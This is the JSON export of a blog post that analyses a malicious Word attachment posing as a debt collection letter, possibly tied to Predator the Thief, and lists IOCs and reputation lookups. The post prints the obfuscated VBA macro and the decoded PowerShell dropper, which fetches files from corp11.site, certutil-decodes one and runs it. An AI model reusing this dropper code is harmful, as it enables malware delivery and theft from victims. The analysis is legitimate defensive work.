{"id":1328,"date":"2020-03-19T17:21:18","date_gmt":"2020-03-19T17:21:18","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=1328"},"modified":"2020-03-19T17:27:11","modified_gmt":"2020-03-19T17:27:11","slug":"2020-03-18-deobfuscation-of-maldoc-script-possibly-predator-the-thief","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=1328","title":{"rendered":"2020-03-18 Deobfuscation of MalDoc script &#8211; Possibly Predator the Thief"},"content":{"rendered":"<p>Meta<br \/>\n======<\/p>\n<p>From: Debt Collections Agency Houston<br \/>\nSubject: Collection letter for Account Identification number 021621495WZ<br \/>\nAttachment: Word file<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/03\/email.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/03\/email.png\" alt=\"\" width=\"1169\" height=\"410\" class=\"aligncenter size-full wp-image-1329\" \/><\/a><\/p>\n<p>I came across a piece of malspam that caught my eye. I did not try to run this since it was not responding in Any.Run and based on the results from URLHaus, the site was taken offline. Looking at VT and some other sites, I was not able to find any more information about this maldoc. The fun part with this one was trying to figure out what the macro was doing without having to execute it. Based on what I saw in the PoSH script, I am thinking that this may be Predator the Thief since I have seen it use &#8216;certutil&#8217; numerous times (never with the argument option though). The maldoc can be found over <a href=\"http:\/\/github.com\/bloomer1016\/2020-03-18-predator-the-theif-\" rel=\"noopener noreferrer\" target=\"_blank\">here<\/a>.<\/p>\n<p>Using my goto &#8216;<a href=\"http:\/\/blog.didierstevens.com\/programs\/oledump-py\/\" rel=\"noopener noreferrer\" target=\"_blank\">oledump<\/a>&#8216; from Didier Stevens I was able to locate the stream that had the goodness (or badness depending on perspective) in it.<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n$ .\/oledump.py \/Desktop\/Debt-Collection-Letter10127576.doc\r\n1: 146 '\\x01CompObj'\r\n2: 4096 '\\x05DocumentSummaryInformation'\r\n3: 4096 '\\x05SummaryInformation'\r\n4: 8727 '1Table'\r\n5: 36723 'Data'\r\n6: 377 'Macros\/PROJECT'\r\n7: 41 'Macros\/PROJECTwm'\r\n8: M 43079 'Macros\/VBA\/ThisDocument'\r\n9: 4031 'Macros\/VBA\/_VBA_PROJECT'\r\n10: 5436 'Macros\/VBA\/__SRP_0'\r\n11: 383 'Macros\/VBA\/__SRP_1'\r\n12: 6896 'Macros\/VBA\/__SRP_2'\r\n13: 2548 'Macros\/VBA\/__SRP_3'\r\n14: 514 'Macros\/VBA\/dir'\r\n15: 8755 'WordDocument'\r\n<\/pre>\n<p>As seen above, the stream that we need to focus in on is stream 8 (denoted by the capital &#8216;M&#8217;). Using the following command, I was able to see the base64 encoded statement that most likely had the malicious call in it (it is at the bottom of the output).<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n$ .\/oledump.py -s 8 -v \/Desktop\/Debt-Collection-Letter10127576.doc\r\nCall GetObject(StrReverse(&quot;ss&quot; + &quot;ec&quot; + &quot;orP_&quot; + &quot;23&quot; + &quot;niW&quot; + &quot;:2&quot; + &quot;vmi&quot; + &quot;c\\t&quot; + &quot;oor:&quot; + &quot;st&quot; + &quot;m&quot; + &quot;gmn&quot; + &quot;iw&quot;)). _\r\nCreate(StrReverse(&quot;==AAwAQMAUGAxBQbAACA0BwcAkGA&quot; + &quot;MBAdA4GAlBQbAUHAnBgcAEEAtAAIAkDA3BwbAIGA2BAIAMHAzBQZAMGAvBgcAAFAtAAdAIHAhBAdAMFAgAAIAsDAwAQMAUGAxBQbAACA6BAMAgGAjBAZAACAlBAZA8GAjBQZAQGAtAAIAwGApBAdA&quot; + &quot;UHA0BgcAUGAjBAIAsDAiAAUA0EAFBAVAoDA2BgbAUGAkAgIAACAoBAdAEGAQBQLAACAuBwbAkGA0BQYA&quot; + &quot;MGAvBATA0CA0BQZAMFAgAwOAICAtBwbAMGAuAQeAQFAaBQSAIEAcBAUA0EAFBAVAoDA2BgbAUGAkAgIAwCAiAgeAADAoBwYAQGAcBAUA0EAFBAVAo&quot; + &quot;DA2BgbAUGAkAgIAwCAiAQbA8GAjBgLAkDA3BwbAIGA2BAXAAFANB&quot; + &quot;QRAQFA6AgdA4GAlBAJAICAgAgbA8GApBAdAEGAuBQaAQHAzBQZAQEAtA&quot; + &quot;AIAQHAhBAZA4CA5BAVAoFAJBgQA8CAlBAdAkGAzBgLAEDAxAAcAIHAvBwYA8CAvAgOAAHA0BAdAgGAsAAdAEGAkBgLAQEABBAdAUGAHBwLAUGA0BQaAMHAuAQMAEDAwBgcA8GAjBwLA8CA6AAcAQHA0BAaAwCA0BQYAQGAuAAdAIHAlBgcAsEAvAQZAQHApBwcA4CAxAQMAAHAyBwbAMGAvAwLAoDAwBAdAQHAoBAIAUGAjBgcAUHAvBwUA0CAgAgcAUGAmBwcA4GAhBgcAQFAzBAdAkGAC&quot; + &quot;BQLAQHAyBQYAQHATBAIAsDAyBQZAYGAzBgbAEGAyBAVAMHA0BQaAIEAgAQZAwGA1BAZ&quot; + &quot;A8GANBQLAQHAyBwbAAHAtBQS e- ne&quot; + &quot;ddi&quot; + &quot;h ely&quot; + &quot;tswodn&quot; + &quot;iw- &quot; + Replace(&quot;l&quot; + &quot;l%&quot; + &quot;h&quot; + &quot;sr&quot; + &quot;%w&quot; + &quot;op&quot;, &quot;%&quot;, &quot;e&quot;)), _\r\n<\/pre>\n<p>As you can see here, there is some reverse string action going on which breaks up the base64 statement. The first part is pretty easy to make out &#8211; &#8220;winmgmts:root\\cimv2:Win32_Process.&#8221; It is now the rest of the string that we need to try to figure out. using <a href=\"http:\/\/gchq.github.io\/CyberChef\/\" rel=\"noopener noreferrer\" target=\"_blank\">CyberChef<\/a> I was able to figure out a recipe that would take care of that (see the link below in the reference section). What is left is the following Powershell script.<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nImport-Module BitsTransfer;\r\nStart-BitsTransfer -Source http:\/\/corp11.site\/Krert.dat,http:\/\/corp11.site\/GetAD.dat,http:\/\/corp11.site\/BIZTy.dat -Destination &quot;$env:TEMP\\vbow9.com&quot;,&quot;$env:TEMP\\dch0z&quot;,&quot;$env:TEMP\\BIZTy.com&quot;;\r\nSet-Location -Path &quot;$env:TEMP&quot;;\r\ncertutil -decode dch0z mqe10;\r\nStart-Process vbow9 -ArgumentList mqe10\r\n<\/pre>\n<p>Reference<br \/>\n==========<\/p>\n<p><a href=\"http:\/\/urlhaus.abuse.ch\/browse.php?search=corp11.site\" rel=\"noopener noreferrer\" target=\"_blank\">http:\/\/urlhaus.abuse.ch\/browse.php?search=corp11.site<\/a><br \/>\n<a href=\"http:\/\/app.any.run\/tasks\/a762b1f8-4e86-4b8d-badd-f0ad36d0823e\" rel=\"noopener noreferrer\" target=\"_blank\">http:\/\/app.any.run\/tasks\/a762b1f8-4e86-4b8d-badd-f0ad36d0823e<\/a><br \/>\n<a href=\"http:\/\/gchq.github.io\/CyberChef\/#recipe=Reverse('Character')Find_\/_Replace(%7B'option':'Simple%20string','string':'%22%20%2B%20%22'%7D,'',true,false,true,false)From_Base64('A-Za-z0-9%2B\/%3D',true)Remove_null_bytes()Find_\/_Replace(%7B'option':'Regex','string':';'%7D,';%5C%5Cn',true,false,true,false)&amp;input=PT1BQXdBUU1BVUdBeEJRYkFBQ0EwQndjQWtHQSIgKyAiTUJBZEE0R0FsQlFiQVVIQW5CZ2NBRUVBdEFBSUFrREEzQndiQUlHQTJCQUlBTUhBekJRWkFNR0F2QmdjQUFGQXRBQWRBSUhBaEJBZEFNRkFnQUFJQXNEQXdBUU1BVUdBeEJRYkFBQ0E2QkFNQWdHQWpCQVpBQUNBbEJBWkE4R0FqQlFaQVFHQXRBQUlBd0dBcEJBZEEiICsgIlVIQTBCZ2NBVUdBakJBSUFzREFpQUFVQTBFQUZCQVZBb0RBMkJnYkFVR0FrQWdJQUFDQW9CQWRBRUdBUUJRTEFBQ0F1QndiQWtHQTBCUVlBIiArICJNR0F2QkFUQTBDQTBCUVpBTUZBZ0F3T0FJQ0F0QndiQU1HQXVBUWVBUUZBYUJRU0FJRUFjQkFVQTBFQUZCQVZBb0RBMkJnYkFVR0FrQWdJQXdDQWlBZ2VBQURBb0J3WUFRR0FjQkFVQTBFQUZCQVZBbyIgKyAiREEyQmdiQVVHQWtBZ0lBd0NBaUFRYkE4R0FqQmdMQWtEQTNCd2JBSUdBMkJBWEFBRkFOQiIgKyAiUVJBUUZBNkFnZEE0R0FsQkFKQUlDQWdBZ2JBOEdBcEJBZEFFR0F1QlFhQVFIQXpCUVpBUUVBdEEiICsgIkFJQVFIQWhCQVpBNENBNUJBVkFvRkFKQmdRQThDQWxCQWRBa0dBekJnTEFFREF4QUFjQUlIQXZCd1lBOENBdkFnT0FBSEEwQkFkQWdHQXNBQWRBRUdBa0JnTEFRRUFCQkFkQVVHQUhCd0xBVUdBMEJRYUFNSEF1QVFNQUVEQXdCZ2NBOEdBakJ3TEE4Q0E2QUFjQVFIQTBCQWFBd0NBMEJRWUFRR0F1QUFkQUlIQWxCZ2NBc0VBdkFRWkFRSEFwQndjQTRDQXhBUU1BQUhBeUJ3YkFNR0F2QXdMQW9EQXdCQWRBUUhBb0JBSUFVR0FqQmdjQVVIQXZCd1VBMENBZ0FnY0FVR0FtQndjQTRHQWhCZ2NBUUZBekJBZEFrR0FDIiArICJCUUxBUUhBeUJRWUFRSEFUQkFJQXNEQXlCUVpBWUdBekJnYkFFR0F5QkFWQU1IQTBCUWFBSUVBZ0FRWkF3R0ExQkFaIiArICJBOEdBTkJRTEFRSEF5QndiQUFIQXRCUVMgZS0gbmUgKyAiZGRpIiArICJoIGVseSIgKyAidHN3b2RuIiArICJpdy0gIiArIF\" rel=\"noopener noreferrer\" target=\"_blank\">http:\/\/gchq.github.io\/CyberChef\/#recipe=Reverse(&#8216;Character&#8217;)Find_\/_Replace(%7B&#8217;option&#8217;:&#8217;Simple%20string&#8217;,&#8217;string&#8217;:&#8217;%22%20%2B%20%22&#8217;%7D,&#8221;,true,false,true,false)From_Base64(&#8216;A-Za-z0-9%2B\/%3D&#8217;,true)Remove_null_bytes()Find_\/_Replace(%7B&#8217;option&#8217;:&#8217;Regex&#8217;,&#8217;string&#8217;:&#8217;;&#8217;%7D,&#8217;;%5C%5Cn&#8217;,true,false,true,false)&amp;input=PT1BQXdBUU1BVUdBeEJRYkFBQ0EwQndjQWtHQSIgKyAiTUJBZEE0R0FsQlFiQVVIQW5CZ2NBRUVBdEFBSUFrREEzQndiQUlHQTJCQUlBTUhBekJRWkFNR0F2QmdjQUFGQXRBQWRBSUhBaEJBZEFNRkFnQUFJQXNEQXdBUU1BVUdBeEJRYkFBQ0E2QkFNQWdHQWpCQVpBQUNBbEJBWkE4R0FqQlFaQVFHQXRBQUlBd0dBcEJBZEEiICsgIlVIQTBCZ2NBVUdBakJBSUFzREFpQUFVQTBFQUZCQVZBb0RBMkJnYkFVR0FrQWdJQUFDQW9CQWRBRUdBUUJRTEFBQ0F1QndiQWtHQTBCUVlBIiArICJNR0F2QkFUQTBDQTBCUVpBTUZBZ0F3T0FJQ0F0QndiQU1HQXVBUWVBUUZBYUJRU0FJRUFjQkFVQTBFQUZCQVZBb0RBMkJnYkFVR0FrQWdJQXdDQWlBZ2VBQURBb0J3WUFRR0FjQkFVQTBFQUZCQVZBbyIgKyAiREEyQmdiQVVHQWtBZ0lBd0NBaUFRYkE4R0FqQmdMQWtEQTNCd2JBSUdBMkJBWEFBRkFOQiIgKyAiUVJBUUZBNkFnZEE0R0FsQkFKQUlDQWdBZ2JBOEdBcEJBZEFFR0F1QlFhQVFIQXpCUVpBUUVBdEEiICsgIkFJQVFIQWhCQVpBNENBNUJBVkFvRkFKQmdRQThDQWxCQWRBa0dBekJnTEFFREF4QUFjQUlIQXZCd1lBOENBdkFnT0FBSEEwQkFkQWdHQXNBQWRBRUdBa0JnTEFRRUFCQkFkQVVHQUhCd0xBVUdBMEJRYUFNSEF1QVFNQUVEQXdCZ2NBOEdBakJ3TEE4Q0E2QUFjQVFIQTBCQWFBd0NBMEJRWUFRR0F1QUFkQUlIQWxCZ2NBc0VBdkFRWkFRSEFwQndjQTRDQXhBUU1BQUhBeUJ3YkFNR0F2QXdMQW9EQXdCQWRBUUhBb0JBSUFVR0FqQmdjQVVIQXZCd1VBMENBZ0FnY0FVR0FtQndjQTRHQWhCZ2NBUUZBekJBZEFrR0FDIiArICJCUUxBUUhBeUJRWUFRSEFUQkFJQXNEQXlCUVpBWUdBekJnYkFFR0F5QkFWQU1IQTBCUWFBSUVBZ0FRWkF3R0ExQkFaIiArICJBOEdBTkJRTEFRSEF5QndiQUFIQXRCUVMgZS0gbmUgKyAiZGRpIiArICJoIGVseSIgKyAidHN3b2RuIiArICJpdy0gIiArIF<\/a><\/p>\n<p>Artifacts<br \/>\n==========<\/p>\n<p>IOCs<br \/>\n&#8212;&#8211;<\/p>\n<p>92.63.192.217<br \/>\nhxxp:\/\/corp11[.]site\/Krert.dat<br \/>\nhxxp:\/\/corp11[.]site\/GetAD.dat<br \/>\nhxxp:\/\/corp11[.]site\/BIZTy.dat<\/p>\n<p>Email hash<br \/>\n&#8212;&#8212;&#8212;&#8211;<\/p>\n<p>fc24582ca0d51c418ea6af61a5d33d3e7409b46631ec11142e2415f272c6d25c &#8212;&#8212; 568769d7-d6b1-4cc0-d916-08d7caae46ab6cdcdf74-eb9a-77af-dd37-673a6d6dc930.eml<\/p>\n<p>File hash<br \/>\n&#8212;&#8212;&#8212;-<\/p>\n<p>5b9d7bedd89a45b625598c20a1435e27d0dcd1def55a8c3ccf7cdad5e0c03d44 &#8212;&#8212; Debt-Collection-Letter10127576.doc<\/p>\n<p>Machinae results<br \/>\n&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<\/p>\n<p>File name: Debt-Collection-Letter10127576.doc<br \/>\nmachinae 5b9d7bedd89a45b625598c20a1435e27d0dcd1def55a8c3ccf7cdad5e0c03d44<br \/>\n[.] Requesting http:\/\/www.virustotal.com\/vtapi\/v2\/file\/report?apikey=XXX (GET)<br \/>\n********************************************************************************<br \/>\n* Information for 5b9d7bedd89a45b625598c20a1435e27d0dcd1def55a8c3ccf7cdad5e0c03d44<br \/>\n* Observable type: hash.sha256 (Auto-detected: True)<br \/>\n********************************************************************************<br \/>\nNot seeing what you expect? Likely not a valid site. Try running with &#8211;list-sites<\/p>\n<p>[-] No VirusTotal File Report Results<\/p>\n<p>$ machinae corp11.site<br \/>\n[.] Requesting http:\/\/www.urlvoid.com\/scan\/corp11.site (GET)<br \/>\n[.] Requesting http:\/\/www.toolsvoid.com\/unshorten-url (POST)<br \/>\n[.] Requesting http:\/\/malc0de.com\/database\/index.php?search=corp11.site (GET)<br \/>\n[.] Requesting http:\/\/www.fortiguard.com\/webfilter?q=corp11.site (GET)<br \/>\n[.] Requesting http:\/\/www.virustotal.com\/vtapi\/v2\/domain\/report?domain=corp11.site&amp;apikey=XXX (GET)<br \/>\n[.] Requesting http:\/\/www.reputationauthority.org\/lookup.php?ip=corp11.site (GET)<br \/>\n[.] Requesting http:\/\/www.mcafee.com\/threat-intelligence\/domain\/default.aspx?domain=corp11.site (GET)<br \/>\n[.] Requesting http:\/\/cymon.io\/api\/nexus\/v1\/domain\/corp11.site (GET)<br \/>\n********************************************************************************<br \/>\n* Information for corp11.site<br \/>\n* Observable type: fqdn (Auto-detected: True)<br \/>\n********************************************************************************<br \/>\nNot seeing what you expect? Likely not a valid site. Try running with &#8211;list-sites<\/p>\n<p>[-] No URLVoid Results<br \/>\n[-] No URL Unshorten Results<br \/>\n[-] No Malc0de Results<br \/>\n[+] Fortinet Category Results<br \/>\n[-] Fortinet URL Category: Spam URLs<br \/>\n[+] VirusTotal pDNS Results<br \/>\n[-] pDNS data from VirusTotal: (&#8216;2020-03-17&#8242;, &#8217;92[.]63.192.217&#8217;)<br \/>\n[-] No Reputation Authority Results<br \/>\n[-] No McAfee Threat Results<\/p>\n<p>$ machinae 92.63.192.217<br \/>\n[.] Requesting http:\/\/www.ipvoid.com\/ip-blacklist-check (POST)<br \/>\n[.] Requesting http:\/\/malc0de.com\/database\/index.php?search=92.63.192.217 (GET)<br \/>\n[.] Requesting http:\/\/abuseipdb.com\/check\/92.63.192.217 (GET)<br \/>\n[.] Requesting http:\/\/ransomwaretracker.abuse.ch\/host\/92.63.192.217 (GET)<br \/>\n[.] Requesting http:\/\/isc.sans.edu\/api\/ip\/92.63.192.217 (GET)<br \/>\n[.] Requesting http:\/\/freegeoip.io\/json\/92.63.192.217 (GET)<br \/>\n[.] Requesting http:\/\/www.fortiguard.com\/webfilter?q=92.63.192.217 (GET)<br \/>\n[.] Requesting http:\/\/www.virustotal.com\/vtapi\/v2\/ip-address\/report?ip=92.63.192.217&amp;apikey=XXX (GET)<br \/>\n[.] Requesting http:\/\/www.reputationauthority.org\/lookup.php?ip=92.63.192.217 (GET)<br \/>\n[.] Requesting http:\/\/www.mcafee.com\/threat-intelligence\/ip\/default.aspx?ip=92.63.192.217 (GET)<br \/>\n[.] Requesting http:\/\/cymon.io\/api\/nexus\/v1\/ip\/92.63.192.217\/events\/ (GET)<br \/>\n[.] Requesting http:\/\/cymon.io\/api\/nexus\/v1\/ip\/92.63.192.217\/domains\/ (GET)<br \/>\n[.] Requesting http:\/\/cymon.io\/api\/nexus\/v1\/ip\/92.63.192.217\/urls\/ (GET)<br \/>\n[.] Requesting http:\/\/www.threatcrowd.org\/searchApi\/v2\/ip\/report\/?ip=92.63.192.217 (GET)<br \/>\n********************************************************************************<br \/>\n* Information for 92.63.192.217<br \/>\n* Observable type: ipv4 (Auto-detected: True)<br \/>\n********************************************************************************<br \/>\nNot seeing what you expect? Likely not a valid site. Try running with &#8211;list-sites<\/p>\n<p>[-] No IPVoid Results<br \/>\n[-] No Malc0de Results<br \/>\n[-] No AbuseIPDB Results<br \/>\n[-] No RansomwareTracker Results<br \/>\n[-] No SANS Results<br \/>\n[+] Fortinet Category Results<br \/>\n[-] Fortinet URL Category: Not Rated<br \/>\n[+] VirusTotal pDNS Results<br \/>\n[-] pDNS data from VirusTotal: (&#8216;2020-03-07&#8217;, &#8216;aztest002[.]site&#8217;)<br \/>\n[-] pDNS data from VirusTotal: (&#8216;2020-03-03&#8217;, &#8216;corp1[.]site&#8217;)<br \/>\n[-] pDNS data from VirusTotal: (&#8216;2020-03-16&#8217;, &#8216;corp10[.]site&#8217;)<br \/>\n[-] pDNS data from VirusTotal: (&#8216;2020-03-17&#8217;, &#8216;corp11[.]site&#8217;)<br \/>\n[-] pDNS data from VirusTotal: (&#8216;2020-03-04&#8217;, &#8216;corp5[.]site&#8217;)<br \/>\n[-] pDNS data from VirusTotal: (&#8216;2020-03-06&#8217;, &#8216;corp6[.]site&#8217;)<br \/>\n[-] pDNS data from VirusTotal: (&#8216;2020-03-09&#8217;, &#8216;corp7[.]site&#8217;)<br \/>\n[-] pDNS data from VirusTotal: (&#8216;2020-03-10&#8217;, &#8216;corp8[.]site&#8217;)<br \/>\n[-] pDNS data from VirusTotal: (&#8216;2020-03-12&#8217;, &#8216;corp9[.]site&#8217;)<br \/>\n[-] pDNS data from VirusTotal: (&#8216;2020-03-10&#8217;, &#8216;hrcorp1[.]site&#8217;)<br \/>\n[-] pDNS data from VirusTotal: (&#8216;2020-03-10&#8217;, &#8216;krt1[.]site&#8217;)<br \/>\n[-] pDNS data from VirusTotal: (&#8216;2020-03-16&#8217;, &#8216;krt2[.]site&#8217;)<br \/>\n[-] pDNS data from VirusTotal: (&#8216;2020-03-02&#8217;, &#8216;palzet1-bg[.]site&#8217;)<br \/>\n[-] pDNS data from VirusTotal: (&#8216;2020-03-02&#8217;, &#8216;palzet1[.]site&#8217;)<br \/>\n[-] pDNS data from VirusTotal: (&#8216;2020-03-05&#8217;, &#8216;testing0[.]site&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-18&#8217;, &#8216;hXXps:\/\/krt2[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-18&#8217;, &#8216;hXXp:\/\/krt2[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-17&#8217;, &#8216;hXXp:\/\/corp11[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-17&#8217;, &#8216;hXXp:\/\/corp11[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-17&#8217;, &#8216;hXXp:\/\/corp11[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-17&#8217;, &#8216;hXXp:\/\/corp9[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-17&#8217;, &#8216;hXXp:\/\/corp9[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-17&#8217;, &#8216;hXXp:\/\/corp9[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-16&#8217;, &#8216;hXXp:\/\/testing0[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-16&#8217;, &#8216;hXXp:\/\/corp10[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-16&#8217;, &#8216;hXXp:\/\/corp10[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-16&#8217;, &#8216;hXXp:\/\/hrcorp1[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-16&#8217;, &#8216;hXXp:\/\/corp9[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-16&#8217;, &#8216;hXXp:\/\/corp9[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-14&#8217;, &#8216;hXXp:\/\/corp9[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-14&#8217;, &#8216;hXXp:\/\/corp9[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-13&#8217;, &#8216;hXXp:\/\/krt1[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-13&#8217;, &#8216;hXXp:\/\/krt1[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-11&#8217;, &#8216;hXXp:\/\/hrcorp1[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-11&#8217;, &#8216;hXXp:\/\/krt1[.]site\/uhgaugnziioppop9\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-11&#8217;, &#8216;hXXp:\/\/corp8[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-11&#8217;, &#8216;hXXp:\/\/corp8[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-11&#8217;, &#8216;hXXp:\/\/corp8[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-09&#8217;, &#8216;hXXp:\/\/krt1[.]site\/uhGaUGnzIIOPpoP9\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-09&#8217;, &#8216;hXXp:\/\/corp7[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-09&#8217;, &#8216;hXXp:\/\/corp7[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-09&#8217;, &#8216;hXXp:\/\/corp7[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-09&#8217;, &#8216;hXXp:\/\/krt1[.]site\/uhGaUGnzIIOPpoP9\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-07&#8217;, &#8216;hXXp:\/\/hrcorp1[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-07&#8217;, &#8216;hXXps:\/\/krt1[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-06&#8217;, &#8216;hXXp:\/\/corp6[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-05&#8217;, &#8216;hXXps:\/\/hrcorp1[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-04&#8217;, &#8216;hXXp:\/\/corp5[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-04&#8217;, &#8216;hXXp:\/\/palzet1-bg[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-04&#8217;, &#8216;hXXp:\/\/palzet1-bg[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-04&#8217;, &#8216;hXXp:\/\/corp1[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-04&#8217;, &#8216;hXXp:\/\/corp1[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-04&#8217;, &#8216;hXXp:\/\/palzet1-bg[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-03&#8217;, &#8216;hXXp:\/\/corp1[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-03&#8217;, &#8216;hXXp:\/\/palzet1-bg[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-03&#8217;, &#8216;hXXp:\/\/palzet1[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-03&#8217;, &#8216;hXXp:\/\/palzet1[.]site\/&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-03-02&#8217;, &#8216;hXXp:\/\/palzet1[.]site\/&#8217;)<br \/>\n[+] Reputation Authority Results<br \/>\n[-] Reputation Authority Score: 85\/100<br \/>\n[-] No McAfee Threat Results<br \/>\n[+] ThreatCrowd IP Report Results<br \/>\n[-] Passive DNS: (&#8216;hrcorp1[.]site&#8217;, &#8216;2020-03-11&#8217;)<\/p>\n<p>Munin results<br \/>\n&#8212;&#8212;&#8212;&#8212;&#8211;<\/p>\n<p>1\/ 1 &gt; Unknown<br \/>\nHASH: 5b9d7bedd89a45b625598c20a1435e27d0dcd1def55a8c3ccf7cdad5e0c03d44 COMMENT: Debt-Collection-Letter10127576.doc<br \/>\nRESULT: &#8211; \/ &#8211;<br \/>\n[!] Sample on ANY.RUN URL: <a href=\"http:\/\/any.run\/report\/5b9d7bedd89a45b625598c20a1435e27d0dcd1def55a8c3ccf7cdad5e0c03d44\" rel=\"noopener noreferrer\" target=\"_blank\">http:\/\/any.run\/report\/5b9d7bedd89a45b625598c20a1435e27d0dcd1def55a8c3ccf7cdad5e0c03d44<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Meta ====== From: Debt Collections Agency Houston Subject: Collection letter for Account Identification number 021621495WZ Attachment: Word file I came across a piece of malspam that caught my eye. I did not try to run this since it was not responding in Any.Run and based on the results from URLHaus, the site was taken offline. Looking at VT and some other sites, I was not able to find any more information about this maldoc. The fun part with this one was trying to figure out what the macro was doing without having to execute it. Based on what I saw&#8230;<\/p>\n<p> <a class=\"continue-reading-link\" href=\"https:\/\/www.herbiez.com\/?p=1328\"><span>Continue reading<\/span><i class=\"crycon-right-dir\"><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[10],"tags":[33,36],"class_list":["post-1328","post","type-post","status-publish","format-standard","hentry","category-code","tag-deobfuscating-code","tag-predator-the-thief"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1328","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1328"}],"version-history":[{"count":5,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1328\/revisions"}],"predecessor-version":[{"id":1334,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1328\/revisions\/1334"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1328"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1328"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\